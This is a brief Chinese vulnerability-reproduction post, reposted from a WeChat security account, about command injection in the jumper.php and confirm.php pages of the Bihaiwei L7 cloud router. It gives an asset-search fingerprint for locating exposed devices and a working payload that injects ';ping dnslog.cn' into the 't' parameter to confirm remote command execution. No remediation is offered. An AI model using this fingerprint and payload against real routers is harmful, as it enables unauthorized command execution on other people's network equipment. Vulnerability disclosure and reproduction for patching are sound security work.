资产收集
app="碧海威科技-L7云路由"
漏洞复现
构造url,请求DNSlog
/notice/jumper.php?t=;ping dnslog.cn/notice/confirm.php?t=;ping dnslog.cn
原文始发于微信公众号(Devil安全):【漏洞复现】碧海威科技-L7云路由存在jumper.php、confirm.php命令执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
- 本文由 admin 发表于 2024年7月2日08:09:15
- 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
碧海威科技-L7云路由存在jumper.php、confirm.php命令执行漏洞https://cn-sec.com/archives/2904386.html
评论